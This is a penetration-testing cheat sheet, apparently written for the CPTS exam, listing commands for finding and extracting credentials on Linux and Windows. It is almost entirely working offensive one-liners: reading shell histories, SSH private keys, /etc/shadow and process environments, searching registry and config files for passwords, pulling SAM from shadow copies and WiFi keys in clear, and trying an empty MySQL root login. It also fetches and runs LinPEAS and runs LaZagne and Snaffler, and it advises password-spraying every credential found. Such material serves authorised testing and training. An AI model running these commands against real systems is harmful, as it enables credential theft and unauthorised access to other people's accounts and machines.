
Credential Hunting Scripts

Automated one-liners and scripts for Linux and Windows credential discovery — config files, environment variables, command history, browsers, and credential managers.

Linux Credential Hunting

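# Linux credential hunting: independent one-liners, run them individually.
# Nothing here sets -e, so a failing command never stops the next one; most
# targets are unreadable without root, hence the blanket 2>/dev/null.

# History files - highest yield: commands typed with inline passwords persist here
cat ~/.bash_history ~/.zsh_history ~/.sh_history 2>/dev/null
# -exec ... + instead of xargs: paths with spaces survive, and nothing is run
# when there is no match
find / -name ".*_history" -type f -exec cat -- {} + 2>/dev/null

# SSH private keys (grep -v proc drops /proc pseudo-paths; the -o chain is
# grouped so the 2>/dev/null/-print apply to the whole expression)
find / \( -name "id_rsa" -o -name "id_ed25519" -o -name "*.pem" \) 2>/dev/null | grep -v proc
cat ~/.ssh/id_rsa 2>/dev/null

# Config files with passwords (common patterns).
# The pattern lives in a variable so the quote class ['"] can be written
# without breaking the shell's own quoting: inlined, the " inside the class
# terminates the double-quoted string and leaves an unterminated one behind.
pat="(password|passwd|pwd|secret|token|api_key)\s*[=:]\s*['\"]?\w+"
grep -riE -- "$pat" /etc /var/www /opt /home 2>/dev/null

# PHP / Django config files (web apps). NUL-delimited end to end so paths
# with spaces are not split; grep -lZ emits NUL-terminated file names.
find / \( -name "config.php" -o -name "wp-config.php" -o -name "settings.py" \) -type f -print0 2>/dev/null \
  | xargs -0 grep -lZ "password" 2>/dev/null \
  | xargs -0 grep -E "(DB_PASS|password|secret)"

# Environment variables (service accounts often carry creds in env)
env | grep -iE "(pass|pwd|secret|token|key)"
# environ of processes owned by other users is normally unreadable; those are
# skipped silently under 2>/dev/null, so an empty result is not conclusive
cat /proc/*/environ 2>/dev/null | tr '\0' '\n' | grep -i pass

# /etc/passwd / shadow (shadow needs root or the shadow group)
cat /etc/shadow 2>/dev/null
# interactive accounts only: drop nologin/false shells
grep -vE "nologin|false" /etc/passwd

# Service account credentials
cat /etc/mysql/my.cnf /etc/mysql/debian.cnf 2>/dev/null
find /var/lib -name "*.conf" -type f -exec grep -l -- password {} + 2>/dev/null

# Files readable by the current user that were modified after /etc/passwd
# (-newer compares mtime and -readable is evaluated as the invoking user;
# this says nothing about what root accessed)
find / -readable -newer /etc/passwd 2>/dev/null | head -20

# Cron jobs with credentials (each command gets its own 2>/dev/null; a
# trailing one applies only to the last command of the list)
crontab -l 2>/dev/null; cat /etc/crontab 2>/dev/null; ls /etc/cron.*/ 2>/dev/null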

Windows Credential Hunting

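# Windows credential hunting (cmd.exe). Independent one-liners; "2>nul" hides
# access-denied noise. Environment variables use cmd syntax (%VAR%); under
# PowerShell substitute $env:VAR.

# Stored credentials
cmdkey /list
# Output lists Windows Credential Manager entries (target, type, user name;
# the secret itself is not printed)

# Registry - common password storage locations (/f matches names and data,
# /s recurses; parts of HKLM need an elevated prompt)
reg query HKLM /f "password" /t REG_SZ /s 2>nul
reg query HKCU /f "password" /t REG_SZ /s 2>nul
# Winlogon: autologon credentials are stored under this key
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" 2>nul

# Unattended install files (setup answer files can embed account passwords)
type C:\Windows\sysprep\sysprep.xml 2>nul
type C:\Windows\Panther\Unattend.xml 2>nul
type C:\Windows\system32\sysprep\unattend.xml 2>nul

# PowerShell history (PSReadLine writes it per user). cmd form; under
# PowerShell use $env:APPDATA in place of %APPDATA%.
type %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt 2>nul

# IIS web.config files. findstr /s walks subdirectories and searches file
# contents; piping "dir /s /b" into findstr only matched the path names.
findstr /si "password" C:\inetpub\web.config 2>nul

# Application config files
dir /s /b "C:\*config*" 2>nul
findstr /si "password" C:\Users\*.xml C:\Users\*.txt C:\Users\*.ini 2>nul

# SAM / SYSTEM backup (VSS); listing shadows needs an elevated prompt
vssadmin list shadows 2>nul
# If shadows exist, copy SAM/SYSTEM from shadow copy

# WiFi passwords (key=clear may need an elevated prompt; SSID is a placeholder)
netsh wlan show profiles
netsh wlan show profile name="SSID" key=clear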

Database Credential Discovery

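# MySQL
# read the file directly instead of cat | grep
grep -E "(user|pass)" /etc/mysql/my.cnf
# -exec ... + instead of xargs: paths with spaces survive
find / -name ".my.cnf" -type f -exec cat -- {} + 2>/dev/null
# tries an empty root password; 2>/dev/null hides the access-denied error,
# so no output means the login failed, not that the table is empty
mysql -u root --password="" -e "SELECT User,authentication_string FROM mysql.user;" 2>/dev/null

# PostgreSQL
find / \( -name "pg_hba.conf" -o -name "postgresql.conf" \) 2>/dev/null
# ~/.pgpass lines are host:port:database:user:password
cat ~/.pgpass 2>/dev/null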

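# MSSQL (Windows)
# Look in the SQL Server instance error log (not a config file). cmd's "type"
# does not expand a wildcard inside a directory component, so the MSSQL*
# instance folder is enumerated with for /d first; %~d strips any surrounding
# quotes. Interactive form - in a .bat file write %%d.
for /d %d in ("C:\Program Files\Microsoft SQL Server\MSSQL*") do @(type "%~d\MSSQL\Log\ERRORLOG" 2>nul | findstr pass)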

Network Config Credentials

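# VPN configs: any *.ovpn, or a *.conf under a */vpn/* directory
# (explicit grouping; this is how find already binds -o and the implicit -a)
find / \( -name "*.ovpn" -o \( -name "*.conf" -path "*/vpn/*" \) \) 2>/dev/null
# -h drops the file-name prefix grep adds when given several files
grep -hE "(auth|pass)" /etc/openvpn/*.conf 2>/dev/null

# Network manager (the connection directory is normally root-only)
grep -hE "(psk|password)" /etc/NetworkManager/system-connections/* 2>/dev/null

# SSH config (reveals hosts and potential key paths). /etc/ssh/ssh_config is
# the client-side file; the daemon's settings live in sshd_config.
cat ~/.ssh/config 2>/dev/null
cat /etc/ssh/ssh_config 2>/dev/null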

Automated Tools

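# LinPEAS (Linux). Fetch to a file first: a truncated transfer then fails
# loudly instead of being half-executed by sh, and the file can be checked
# against a known-good copy before it runs.
curl -fsSL https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh -o /tmp/linpeas.sh
sha256sum /tmp/linpeas.sh   # compare with <EXPECTED_SHA256 from a trusted copy>
sh /tmp/linpeas.sh
# Or upload and run: ./linpeas.sh | tee /tmp/linpeas.txt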

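# WinPEAS (Windows, PowerShell). Relative executables need the .\ prefix;
# PowerShell does not search the current directory for commands.
.\winPEASx64.exe | Tee-Object -FilePath C:\Windows\Temp\peas.txt

# LaZagne - credential extraction tool (cross-platform)
./lazagne.py all
# Searches: browsers, databases, git, mail, maven, sysadmin tools

# Windows: LaZagne.exe
.\LaZagne.exe all > C:\Windows\Temp\lazagne_out.txt

# Snaffler - network share credential hunting (-s prints hits to stdout,
# -o also writes them to the named log)
.\Snaffler.exe -s -o snaffler.log
# Searches SYSVOL, shares for config files, credentials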
CPTS Exam: Credential reuse is extremely common in the exam environment. Every credential you find should be immediately tested against all discovered services via password spray.